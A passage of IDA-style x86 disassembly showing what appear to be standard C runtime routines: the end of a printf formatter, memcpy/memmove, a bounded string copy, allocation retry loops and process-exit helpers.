		jnz	short loc_4074C5
		xor	ebx, ebx

loc_4074C5:				; CODE XREF: sub_406D87+73Aj
		cmp	[ebp+1F8h+var_218], 0
		jge	short loc_4074D4
		mov	[ebp+1F8h+var_218], 1
		jmp	short loc_4074E5
; ---------------------------------------------------------------------------

loc_4074D4:				; CODE XREF: sub_406D87+742j
		and	[ebp+1F8h+var_210], 0FFFFFFF7h
		mov	eax, 200h
		cmp	[ebp+1F8h+var_218], eax
		jle	short loc_4074E5
		mov	[ebp+1F8h+var_218], eax

loc_4074E5:				; CODE XREF: sub_406D87+74Bj
					; sub_406D87+759j
		mov	eax, edi
		or	eax, ebx
		jnz	short loc_4074EF
		and	[ebp+1F8h+var_234], 0

loc_4074EF:				; CODE XREF: sub_406D87+762j
		lea	esi, [ebp+1F8h+var_D]

loc_4074F5:				; CODE XREF: sub_406D87+7A0j
		mov	eax, [ebp+1F8h+var_218]
		dec	[ebp+1F8h+var_218]
		test	eax, eax
		jg	short loc_407505
		mov	eax, edi
		or	eax, ebx
		jz	short loc_407529

loc_407505:				; CODE XREF: sub_406D87+776j
		mov	eax, [ebp+1F8h+var_220]
		cdq
		push	edx
		push	eax
		push	ebx
		push	edi
		call	sub_40DB00
		add	ecx, 30h
		cmp	ecx, 39h
		mov	[ebp+1F8h+var_260], ebx
		mov	edi, eax
		mov	ebx, edx
		jle	short loc_407524
		add	ecx, [ebp+1F8h+var_244]

loc_407524:				; CODE XREF: sub_406D87+798j
		mov	[esi], cl
		dec	esi
		jmp	short loc_4074F5
; ---------------------------------------------------------------------------

loc_407529:				; CODE XREF: sub_406D87+77Cj
		lea	eax, [ebp+1F8h+var_D]
		sub	eax, esi
		inc	esi
		test	word ptr [ebp+1F8h+var_210], 200h
		mov	[ebp+1F8h+var_220], eax
		mov	[ebp+1F8h+var_21C], esi
		jz	short loc_40758C
		test	eax, eax
		jz	short loc_40754B
		mov	ecx, esi
		cmp	byte ptr [ecx],	30h
		jz	short loc_40758C

loc_40754B:				; CODE XREF: sub_406D87+7BBj
		dec	[ebp+1F8h+var_21C]
		mov	ecx, [ebp+1F8h+var_21C]
		mov	byte ptr [ecx],	30h
		inc	eax
		jmp	short loc_407589
; ---------------------------------------------------------------------------

loc_407557:				; CODE XREF: sub_406D87+7DAj
		dec	ecx
		cmp	[eax], si
		jz	short loc_407563
		inc	eax
		inc	eax

loc_40755F:				; CODE XREF: sub_406D87+445j
		cmp	ecx, esi
		jnz	short loc_407557

loc_407563:				; CODE XREF: sub_406D87+7D4j
		sub	eax, [ebp+1F8h+var_21C]
		sar	eax, 1
		jmp	short loc_407589
; ---------------------------------------------------------------------------

loc_40756A:				; CODE XREF: sub_406D87+429j
		cmp	edi, esi
		jnz	short loc_407576
		mov	eax, off_423924
		mov	[ebp+1F8h+var_21C], eax

loc_407576:				; CODE XREF: sub_406D87+7E5j
		mov	eax, [ebp+1F8h+var_21C]
		jmp	short loc_407582
; ---------------------------------------------------------------------------

loc_40757B:				; CODE XREF: sub_406D87+7FDj
		dec	ecx
		cmp	byte ptr [eax],	0
		jz	short loc_407586
		inc	eax

loc_407582:				; CODE XREF: sub_406D87+7F2j
		cmp	ecx, esi
		jnz	short loc_40757B

loc_407586:				; CODE XREF: sub_406D87+7F8j
		sub	eax, [ebp+1F8h+var_21C]

loc_407589:				; CODE XREF: sub_406D87+4E1j
					; sub_406D87+4E9j ...
		mov	[ebp+1F8h+var_220], eax

loc_40758C:				; CODE XREF: sub_406D87+3B0j
					; sub_406D87+461j ...
		cmp	[ebp+1F8h+var_248], 0
		jnz	loc_407691
		mov	eax, [ebp+1F8h+var_210]
		test	al, 40h
		jz	short loc_4075C2
		test	ax, 100h
		jz	short loc_4075A9
		mov	[ebp+1F8h+var_230], 2Dh
		jmp	short loc_4075BB
; ---------------------------------------------------------------------------

loc_4075A9:				; CODE XREF: sub_406D87+81Aj
		test	al, 1
		jz	short loc_4075B3
		mov	[ebp+1F8h+var_230], 2Bh
		jmp	short loc_4075BB
; ---------------------------------------------------------------------------

loc_4075B3:				; CODE XREF: sub_406D87+824j
		test	al, 2
		jz	short loc_4075C2
		mov	[ebp+1F8h+var_230], 20h

loc_4075BB:				; CODE XREF: sub_406D87+820j
					; sub_406D87+82Aj
		mov	[ebp+1F8h+var_234], 1

loc_4075C2:				; CODE XREF: sub_406D87+814j
					; sub_406D87+82Ej
		mov	ebx, [ebp+1F8h+var_238]
		sub	ebx, [ebp+1F8h+var_220]
		sub	ebx, [ebp+1F8h+var_234]
		test	byte ptr [ebp+1F8h+var_210], 0Ch
		jnz	short loc_4075E2
		push	[ebp+1F8h+var_228]
		lea	eax, [ebp+1F8h+var_22C]
		push	ebx
		push	20h
		call	sub_406D19
		add	esp, 0Ch

loc_4075E2:				; CODE XREF: sub_406D87+848j
		push	[ebp+1F8h+var_234]
		mov	edi, [ebp+1F8h+var_228]
		lea	eax, [ebp+1F8h+var_22C]
		lea	ecx, [ebp+1F8h+var_230]
		call	sub_406D3D
		test	byte ptr [ebp+1F8h+var_210], 8
		pop	ecx
		jz	short loc_40760F
		test	byte ptr [ebp+1F8h+var_210], 4
		jnz	short loc_40760F
		push	edi
		push	ebx
		push	30h
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406D19
		add	esp, 0Ch

loc_40760F:				; CODE XREF: sub_406D87+871j
					; sub_406D87+877j
		cmp	[ebp+1F8h+var_23C], 0
		mov	eax, [ebp+1F8h+var_220]
		jz	short loc_407669
		test	eax, eax
		jle	short loc_407669
		mov	esi, [ebp+1F8h+var_21C]
		mov	[ebp+1F8h+var_260], eax

loc_407622:				; CODE XREF: sub_406D87+8D8j
		movzx	eax, word ptr [esi]
		dec	[ebp+1F8h+var_260]
		push	eax
		push	6
		lea	eax, [ebp+1F8h+var_C]
		push	eax
		lea	eax, [ebp+1F8h+var_268]
		inc	esi
		push	eax
		inc	esi
		call	sub_40DAE2
		add	esp, 10h
		test	eax, eax
		jnz	short loc_407663
		cmp	[ebp+1F8h+var_268], eax
		jz	short loc_407663
		push	[ebp+1F8h+var_268]
		lea	eax, [ebp+1F8h+var_22C]
		lea	ecx, [ebp+1F8h+var_C]
		call	sub_406D3D
		cmp	[ebp+1F8h+var_260], 0
		pop	ecx
		jnz	short loc_407622
		jmp	short loc_407676
; ---------------------------------------------------------------------------

loc_407663:				; CODE XREF: sub_406D87+8BBj
					; sub_406D87+8C0j
		or	[ebp+1F8h+var_22C], 0FFFFFFFFh
		jmp	short loc_407676
; ---------------------------------------------------------------------------

loc_407669:				; CODE XREF: sub_406D87+88Fj
					; sub_406D87+893j
		mov	ecx, [ebp+1F8h+var_21C]
		push	eax
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406D3D
		pop	ecx

loc_407676:				; CODE XREF: sub_406D87+8DAj
					; sub_406D87+8E0j
		cmp	[ebp+1F8h+var_22C], 0
		jl	short loc_407691
		test	byte ptr [ebp+1F8h+var_210], 4
		jz	short loc_407691
		push	edi
		push	ebx
		push	20h
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406D19
		add	esp, 0Ch

loc_407691:				; CODE XREF: sub_406D87+57Cj
					; sub_406D87+809j ...
		cmp	[ebp+1F8h+var_24C], 0
		jz	short loc_4076A4 ; default
		push	[ebp+1F8h+var_24C]
		call	sub_4039C3
		and	[ebp+1F8h+var_24C], 0
		pop	ecx

loc_4076A4:				; CODE XREF: sub_406D87+19Cj
					; sub_406D87+1BFj ...
		mov	ebx, [ebp+1F8h+var_240]	; default
		mov	al, [ebx]
		test	al, al
		mov	[ebp+1F8h+var_211], al
		jz	short loc_4076D4
		mov	ecx, [ebp+1F8h+var_26C]
		mov	edi, [ebp+1F8h+var_224]
		mov	dl, al
		jmp	loc_406EE5
; ---------------------------------------------------------------------------

loc_4076BD:				; CODE XREF: sub_406D87+36Ej
					; sub_406D87+55Bj
		call	sub_405B83
		mov	dword ptr [eax], 16h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		jmp	loc_406DF7
; ---------------------------------------------------------------------------

loc_4076D4:				; CODE XREF: sub_406D87+158j
					; sub_406D87+166j ...
		cmp	[ebp+1F8h+var_250], 0
		jz	short loc_4076E1
		mov	eax, [ebp+1F8h+var_254]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4076E1:				; CODE XREF: sub_406D87+951j
		mov	eax, [ebp+1F8h+var_22C]

loc_4076E4:				; CODE XREF: sub_406D87+88j
		mov	ecx, [ebp+1F8h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 1F8h
		leave
		retn
sub_406D87	endp

; ---------------------------------------------------------------------------
		db 8Dh,	49h, 0
off_4076FF	dd offset loc_4070C9	; DATA XREF: sub_406D87+1A2r
		dd offset loc_406F30	; jump table for switch	statement
		dd offset loc_406F4B
		dd offset loc_406F9A
		dd offset loc_406FD4
		dd offset loc_406FDC
		dd offset loc_407013
		dd offset loc_40710B
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407720	proc near		; CODE XREF: sub_402F60+4Dp
					; sub_405F00+2DAp ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	esi, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		mov	edi, [ebp+arg_0]
		mov	eax, ecx
		mov	edx, ecx
		add	eax, esi
		cmp	edi, esi
		jbe	short loc_407740
		cmp	edi, eax
		jb	loc_4078E4

loc_407740:				; CODE XREF: sub_407720+16j
		cmp	ecx, 100h
		jb	short loc_407767
		cmp	dword_4352E0, 0
		jz	short loc_407767
		push	edi
		push	esi
		and	edi, 0Fh
		and	esi, 0Fh
		cmp	edi, esi
		pop	esi
		pop	edi
		jnz	short loc_407767
		pop	esi
		pop	edi
		pop	ebp
		jmp	sub_40DC1C
; ---------------------------------------------------------------------------

loc_407767:				; CODE XREF: sub_407720+26j
					; sub_407720+2Fj ...
		test	edi, 3
		jnz	short loc_407784
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_4077A4
		rep movsd
		jmp	ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407784:				; CODE XREF: sub_407720+4Dj
		mov	eax, edi
		mov	edx, 3
		sub	ecx, 4
		jb	short loc_40779C
		and	eax, 3
		add	ecx, eax
		jmp	dword ptr ds:loc_4077A4+4[eax*4]
; ---------------------------------------------------------------------------

loc_40779C:				; CODE XREF: sub_407720+6Ej
		jmp	dword ptr ds:loc_4078A4[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4077A4:				; CODE XREF: sub_407720+58j
					; sub_407720+B6j ...
		jmp	ds:off_407828[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_4077B8
		dd offset loc_4077E4
		dd offset loc_407808
; ---------------------------------------------------------------------------

loc_4077B8:				; DATA XREF: sub_407720+8Co
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		add	esi, 3
		add	edi, 3
		cmp	ecx, 8
		jb	short loc_4077A4
		rep movsd
		jmp	ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4077E4:				; DATA XREF: sub_407720+90o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		add	esi, 2
		add	edi, 2
		cmp	ecx, 8
		jb	short loc_4077A4
		rep movsd
		jmp	ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407808:				; DATA XREF: sub_407720+94o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		add	esi, 1
		shr	ecx, 2
		add	edi, 1
		cmp	ecx, 8
		jb	short loc_4077A4
		rep movsd
		jmp	ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_407828	dd offset loc_40788B	; DATA XREF: sub_407720:loc_4077A4r
		dd offset loc_407878
		dd offset loc_407870
		dd offset loc_407868
		dd offset loc_407860
		dd offset loc_407858
		dd offset loc_407850
		dd offset loc_407848
; ---------------------------------------------------------------------------

loc_407848:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+124o
		mov	eax, [esi+ecx*4-1Ch]
		mov	[edi+ecx*4-1Ch], eax

loc_407850:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+120o
		mov	eax, [esi+ecx*4-18h]
		mov	[edi+ecx*4-18h], eax

loc_407858:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+11Co
		mov	eax, [esi+ecx*4-14h]
		mov	[edi+ecx*4-14h], eax

loc_407860:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+118o
		mov	eax, [esi+ecx*4-10h]
		mov	[edi+ecx*4-10h], eax

loc_407868:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+114o
		mov	eax, [esi+ecx*4-0Ch]
		mov	[edi+ecx*4-0Ch], eax

loc_407870:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+110o
		mov	eax, [esi+ecx*4-8]
		mov	[edi+ecx*4-8], eax

loc_407878:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720+10Co
		mov	eax, [esi+ecx*4-4]
		mov	[edi+ecx*4-4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_40788B:				; CODE XREF: sub_407720:loc_4077A4j
					; DATA XREF: sub_407720:off_407828o
		jmp	ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_407894	dd offset loc_4078A4	; DATA XREF: sub_407720+5Cr
					; sub_407720+BAr ...
		dd offset loc_4078AC
		dd offset loc_4078B8
		dd offset loc_4078CC
; ---------------------------------------------------------------------------

loc_4078A4:				; CODE XREF: sub_407720+5Cj
					; sub_407720+BAj ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4078AC:				; CODE XREF: sub_407720+5Cj
					; sub_407720+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4078B8:				; CODE XREF: sub_407720+5Cj
					; sub_407720+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4078CC:				; CODE XREF: sub_407720+5Cj
					; sub_407720+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4078E4:				; CODE XREF: sub_407720+1Aj
		lea	esi, [ecx+esi-4]
		lea	edi, [ecx+edi-4]
		test	edi, 3
		jnz	short loc_407918
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_40790C
		std
		rep movsd
		cld
		jmp	ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_40790C:				; CODE XREF: sub_407720+1DDj
					; sub_407720+238j ...
		neg	ecx
		jmp	ds:off_4079E0[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407918:				; CODE XREF: sub_407720+1D2j
		mov	eax, edi
		mov	edx, 3
		cmp	ecx, 4
		jb	short loc_407930
		and	eax, 3
		sub	ecx, eax
		jmp	dword ptr ds:loc_407930+4[eax*4]
; ---------------------------------------------------------------------------

loc_407930:				; CODE XREF: sub_407720+202j
					; DATA XREF: sub_407720+209r
		jmp	ds:off_407A30[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_407943+1
; ---------------------------------------------------------------------------
		push	90004079h
		jns	short loc_407983

loc_407943:				; DATA XREF: sub_407720+218o
		add	[edx-2EDCFCBAh], cl
		mov	[edi+3], al
		sub	esi, 1
		shr	ecx, 2
		sub	edi, 1
		cmp	ecx, 8
		jb	short loc_40790C
		std
		rep movsd
		cld
		jmp	ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd 2303468Ah, 34788D1h,	0C102468Ah, 478802E9h, 2EE8302h
		dd 8302EF83h
		db 0F9h, 8, 72h
; ---------------------------------------------------------------------------

loc_407983:				; CODE XREF: sub_407720+221j
		mov	ch, bh
		rep movsd
		cld
		jmp	ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
		align 10h
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		sub	esi, 3
		sub	edi, 3
		cmp	ecx, 8
		jb	loc_40790C
		std
		rep movsd
		cld
		jmp	ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_4079E4
		dd offset loc_4079EC
		dd offset loc_4079F4
		dd offset loc_4079FC
		dd offset loc_407A04
		dd offset loc_407A0C
		dd offset loc_407A14
off_4079E0	dd offset loc_407A27	; DATA XREF: sub_407720+1EEr
; ---------------------------------------------------------------------------

loc_4079E4:				; DATA XREF: sub_407720+2A4o
		mov	eax, [esi+ecx*4+1Ch]
		mov	[edi+ecx*4+1Ch], eax

loc_4079EC:				; DATA XREF: sub_407720+2A8o
		mov	eax, [esi+ecx*4+18h]
		mov	[edi+ecx*4+18h], eax

loc_4079F4:				; DATA XREF: sub_407720+2ACo
		mov	eax, [esi+ecx*4+14h]
		mov	[edi+ecx*4+14h], eax

loc_4079FC:				; DATA XREF: sub_407720+2B0o
		mov	eax, [esi+ecx*4+10h]
		mov	[edi+ecx*4+10h], eax

loc_407A04:				; DATA XREF: sub_407720+2B4o
		mov	eax, [esi+ecx*4+0Ch]
		mov	[edi+ecx*4+0Ch], eax

loc_407A0C:				; DATA XREF: sub_407720+2B8o
		mov	eax, [esi+ecx*4+8]
		mov	[edi+ecx*4+8], eax

loc_407A14:				; DATA XREF: sub_407720+2BCo
		mov	eax, [esi+ecx*4+4]
		mov	[edi+ecx*4+4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_407A27:				; CODE XREF: sub_407720+1EEj
					; DATA XREF: sub_407720:off_4079E0o
		jmp	ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
		align 10h
off_407A30	dd offset loc_407A40	; DATA XREF: sub_407720+1E3r
					; sub_407720:loc_407930r ...
		dd offset loc_407A48
		dd offset loc_407A58
		dd offset loc_407A6C
; ---------------------------------------------------------------------------

loc_407A40:				; CODE XREF: sub_407720+1E3j
					; sub_407720:loc_407930j ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407A48:				; CODE XREF: sub_407720+1E3j
					; sub_407720:loc_407930j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407A58:				; CODE XREF: sub_407720+1E3j
					; sub_407720:loc_407930j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407A6C:				; CODE XREF: sub_407720+1E3j
					; sub_407720:loc_407930j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
sub_407720	endp


; =============== S U B	R O U T	I N E =======================================



sub_407A85	proc near		; CODE XREF: sub_402FCC+31p
					; sub_403032+3Dp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	ecx, ebx
		push	esi
		push	edi
		jz	short loc_407A9A
		mov	edi, [esp+0Ch+arg_4]
		cmp	edi, ebx
		ja	short loc_407AB5

loc_407A9A:				; CODE XREF: sub_407A85+Bj
					; sub_407A85+3Aj
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_407AA4:				; CODE XREF: sub_407A85+5Dj
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_407AE6
; ---------------------------------------------------------------------------

loc_407AB5:				; CODE XREF: sub_407A85+13j
		mov	esi, [esp+0Ch+arg_8]
		cmp	esi, ebx
		jnz	short loc_407AC1
		mov	[ecx], bl
		jmp	short loc_407A9A
; ---------------------------------------------------------------------------

loc_407AC1:				; CODE XREF: sub_407A85+36j
		mov	edx, ecx

loc_407AC3:				; CODE XREF: sub_407A85+49j
		mov	al, [esi]
		mov	[edx], al
		inc	edx
		inc	esi
		cmp	al, bl
		jz	short loc_407AD0
		dec	edi
		jnz	short loc_407AC3

loc_407AD0:				; CODE XREF: sub_407A85+46j
		cmp	edi, ebx
		jnz	short loc_407AE4
		mov	[ecx], bl
		call	sub_405B83
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_407AA4
; ---------------------------------------------------------------------------

loc_407AE4:				; CODE XREF: sub_407A85+4Dj
		xor	eax, eax

loc_407AE6:				; CODE XREF: sub_407A85+2Ej
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_407A85	endp


; =============== S U B	R O U T	I N E =======================================



sub_407AEA	proc near		; CODE XREF: sub_405019+3Bp
					; sub_405CE4+48p ...

arg_0		= dword	ptr  4

		push	esi
		push	edi
		xor	esi, esi

loc_407AEE:				; CODE XREF: sub_407AEA+39j
		push	[esp+8+arg_0]
		call	sub_403AA0
		mov	edi, eax
		test	edi, edi
		pop	ecx
		jnz	short loc_407B25
		cmp	dword_4275B0, eax
		jbe	short loc_407B25
		push	esi
		call	ds:off_41D0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4275B0
		jbe	short loc_407B1E
		or	eax, 0FFFFFFFFh

loc_407B1E:				; CODE XREF: sub_407AEA+2Fj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407AEE

loc_407B25:				; CODE XREF: sub_407AEA+12j
					; sub_407AEA+1Aj
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407AEA	endp


; =============== S U B	R O U T	I N E =======================================



sub_407B2A	proc near		; CODE XREF: sub_403176+5p
					; sub_4056CA+30p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		push	edi
		xor	esi, esi

loc_407B2E:				; CODE XREF: sub_407B2A+41j
		push	0
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40DCFF
		mov	edi, eax
		add	esp, 0Ch
		test	edi, edi
		jnz	short loc_407B6D
		cmp	dword_4275B0, eax
		jbe	short loc_407B6D
		push	esi
		call	ds:off_41D0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4275B0
		jbe	short loc_407B66
		or	eax, 0FFFFFFFFh

loc_407B66:				; CODE XREF: sub_407B2A+37j
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407B2E

loc_407B6D:				; CODE XREF: sub_407B2A+1Aj
					; sub_407B2A+22j
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407B2A	endp


; =============== S U B	R O U T	I N E =======================================



sub_407B72	proc near		; CODE XREF: sub_4030C9+58p
					; sub_4030C9+6Fp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		push	edi
		xor	esi, esi

loc_407B76:				; CODE XREF: sub_407B72+44j
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40DE1D
		mov	edi, eax
		test	edi, edi
		pop	ecx
		pop	ecx
		jnz	short loc_407BB8
		cmp	[esp+8+arg_4], eax
		jz	short loc_407BB8
		cmp	dword_4275B0, eax
		jbe	short loc_407BB8
		push	esi
		call	ds:off_41D0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4275B0
		jbe	short loc_407BB1
		or	eax, 0FFFFFFFFh

loc_407BB1:				; CODE XREF: sub_407B72+3Aj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407B76

loc_407BB8:				; CODE XREF: sub_407B72+17j
					; sub_407B72+1Dj ...
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407B72	endp


; =============== S U B	R O U T	I N E =======================================



sub_407BBD	proc near		; CODE XREF: sub_409188+40p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		push	edi
		xor	esi, esi

loc_407BC1:				; CODE XREF: sub_407BBD+49j
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40E038
		mov	edi, eax
		add	esp, 0Ch
		test	edi, edi
		jnz	short loc_407C08
		cmp	[esp+8+arg_8], eax
		jz	short loc_407C08
		cmp	dword_4275B0, eax
		jbe	short loc_407C08
		push	esi
		call	ds:off_41D0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4275B0
		jbe	short loc_407C01
		or	eax, 0FFFFFFFFh

loc_407C01:				; CODE XREF: sub_407BBD+3Fj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407BC1

loc_407C08:				; CODE XREF: sub_407BBD+1Cj
					; sub_407BBD+22j ...
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407BBD	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C0D	proc near		; CODE XREF: sub_4044D2-D9p
					; sub_4044D2-B3p ...

arg_0		= dword	ptr  4

		call	sub_40A004
		push	[esp+arg_0]
		call	sub_409E64
		push	off_423930
		call	sub_405543
		push	0FFh
		call	eax
		add	esp, 0Ch
		retn
sub_407C0D	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C31	proc near		; CODE XREF: sub_407C57+4p

arg_0		= dword	ptr  4

		push	offset aMscoree_dll ; "mscoree.dll"
		call	ds:dword_41D0E0	; GetModuleHandleA
		test	eax, eax
		jz	short locret_407C56
		push	offset aCorexitprocess ; "CorExitProcess"
		push	eax
		call	ds:off_41D0E8
		test	eax, eax
		jz	short locret_407C56
		push	[esp+arg_0]
		call	eax

locret_407C56:				; CODE XREF: sub_407C31+Dj
					; sub_407C31+1Dj
		retn
sub_407C31	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C57	proc near		; CODE XREF: sub_403AA0+34p
					; sub_40428D+1Cp ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	sub_407C31
		pop	ecx
		push	[esp+arg_0]
		call	ds:off_41D050
		int	3		; Trap to Debugger
sub_407C57	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_407C6C	proc near		; CODE XREF: sub_4031A5+Cp
		push	8
		call	sub_405DA7
		pop	ecx
		retn
sub_407C6C	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C75	proc near		; CODE XREF: sub_4031DBp
		push	8
		call	sub_405CCF
		pop	ecx
		retn
sub_407C75	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C7E	proc near		; CODE XREF: sub_407DBB+78p
					; sub_407DBB+88p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, eax
		jmp	short loc_407C8E
; ---------------------------------------------------------------------------

loc_407C83:				; CODE XREF: sub_407C7E+14j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_407C8B
		call	eax

loc_407C8B:				; CODE XREF: sub_407C7E+9j
		add	esi, 4

loc_407C8E:				; CODE XREF: sub_407C7E+3j
		cmp	esi, [esp+4+arg_0]
		jb	short loc_407C83
		pop	esi
		retn
sub_407C7E	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C96	proc near		; CODE XREF: sub_407D29+32p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		mov	esi, [esp+4+arg_0]
		xor	eax, eax
		jmp	short loc_407CAE
; ---------------------------------------------------------------------------

loc_407C9F:				; CODE XREF: sub_407C96+1Cj
		test	eax, eax
		jnz	short loc_407CB4
		mov	ecx, [esi]
		test	ecx, ecx
		jz	short loc_407CAB
		call	ecx

loc_407CAB:				; CODE XREF: sub_407C96+11j
		add	esi, 4

loc_407CAE:				; CODE XREF: sub_407C96+7j
		cmp	esi, [esp+4+arg_4]
		jb	short loc_407C9F

loc_407CB4:				; CODE XREF: sub_407C96+Bj
		pop	esi
		retn
sub_407C96	endp


; =============== S U B	R O U T	I N E =======================================



sub_407CB6	proc near		; CODE XREF: sub_405DD8+12p
					; sub_40CEC4+27p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jnz	short loc_407CDE

loc_407CC1:				; CODE XREF: sub_407CB6+2Fj
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_407CDE:				; CODE XREF: sub_407CB6+9j
		mov	eax, dword_4275B8
		cmp	eax, esi
		jz	short loc_407CC1
		mov	[ecx], eax
		xor	eax, eax
		pop	esi
